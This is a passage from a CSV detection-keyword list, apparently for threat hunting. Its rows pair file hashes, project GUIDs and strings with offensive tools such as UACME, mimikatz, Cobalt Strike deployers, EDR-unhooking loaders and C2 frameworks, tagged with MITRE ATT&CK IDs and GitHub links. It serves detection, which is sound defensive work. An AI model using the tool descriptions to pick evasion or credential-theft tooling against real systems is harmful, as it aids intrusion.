forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*7e8e77d67c76bdf7bf34f0aef7cb3f18f51efb0b2ab20ffe600240824331986e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*7H0LmBxFtXBPd0/3vHe7Z3dmdrPZmTzp3ZldQrJ5LOGxeZ*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*7L0LgBxFtTDc093TPe/dntnM7G6Sncm*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*7z2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*802d51a4b440e079020103c46a56967fb6e32f95188600388ef7c8b91dc746e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*81E60DC6-694E-4F51-88FA-6F481B9A4208*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*82277B35-D159-4B44-8D54-FB66EDD58D5C*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*82928d0a1d3263a9676b6587feba86e1716c1a2c20294c6c2210d4557975ff69*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*83035080-7788-4EA3-82EE-6C06D2E6891F*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*835798995e6df38e12ef18fdcfda6dd1bb8fdffb567a03da46ed1ab7b66a0194*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*83772aa217508279294d91af5cfabec9b5e00b836a2e2f5fe37cf1ebc2905a52*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*847D29FF-8BBC-4068-8BE1-D84B1089B3C0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*854A20FB-2D44-457D-992F-EF13785D2B51*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*866e5289337ab033f89bc57c5274c7ca*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*8776cfacd0e7e409a5f5168261089e6386eeffacedc9158c19d86dfc78e0dc61*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87904247-C363-4F12-A13A-3DA484913F9E*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*879A49C7-0493-4235-85F6-EBF962613A76*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*894a784e-e04c-483c-a762-b6c03e744d0b*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z" +"*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*913d774e5cf0bfad4adfa900997f7a1a*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*91EA50CD-E8DF-4EDF-A765-75354643BD0D*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*946D24E4-201B-4D51-AF9A-3190266E0E1B*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*99E40E7F-00A4-4FB1-9441-B05A56C47C08*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*9E357027-8AA6-4376-8146-F5AF610E14BB*","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" +"*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*9emin1/charlotte*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*A La Vie* A L'Amour*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*a0rtega/metame*","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","1","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" +"*A17656B2-42D1-42CD-B76D-9B60F637BCB5*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*A38C04C7-B172-4897-8471-E3478903035E*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*A3h1nt/gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse 